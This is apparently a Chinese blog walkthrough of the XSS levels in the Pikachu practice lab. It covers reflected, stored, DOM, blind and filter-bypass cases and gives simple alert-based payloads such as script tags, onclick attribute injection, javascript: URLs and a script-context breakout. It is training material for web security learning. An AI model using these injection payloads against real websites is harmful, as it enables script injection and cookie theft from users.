pikache靶场通关——XSS漏洞

1.反射性xxs(get)

(1)首先输入“进行尝试

(2)输入js代码发现长度不够 使用f12修改字符长度

(3)输入js代码

2.反射性xxs(post)

(1)先用系统给的账号密码进行登录看看

(2)输入获取cookie的js语句

<script>alert(document.cookie)</script>

3.存储型xxs

(1)输入获取cookie的js语句

<script>alert(1)</script>

4.DOM型XSS

(1)输入js代码<script>alert(document.cookie)</script>

(2)查看源代码

(3)发现被包裹在a标签里面了,难怪不起作用,这稍微构造以下payload吧

#' οnclick="alert(1)">

5DOM型XSS-S

#' οnclick="alert(1)">

6xxs盲打

(1)输入<script>alert(1)</script>,1

发现页面没反应

(2)查看提示有后台登录地址,密码前面提过,登录会弹出框

7XSS之过滤

(1)<script>alert(1)</script>输个js语句看看

(2)f12查看页面源代码

(3)把URL中的payload部分字母变成大写

(4)发现错误,换个标签试试

<a herf="#" οnclick="alert(1)">

8.XSS之htmlspecialchars

(1)输入<script>alert(1)</script>

(2)f12查看页面源代码

(3)改造下语句

#' οnclick='alert(1)'>

9XSS之href输出

(1)输入<script>alert(1)</script>

(2)发现这里<>被编码了,这样子哪怕是把a标签给闭合也不可能实现,那就只好使用函数了,因为JavaScript里面的a标签中的href属性是可以直接使用函数的。输入javascript:alert(1)

10.XSS之js输出

(1)输入<script>alert(1)</script>

(2)f12查看页面源代码

(3)发现我输入的payload到了script标签上来了,顺便还把script标签给闭合了,所以才会出现这一串乱七八糟的东西使用新的语句

';alert("cookie值是:"+1); //

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值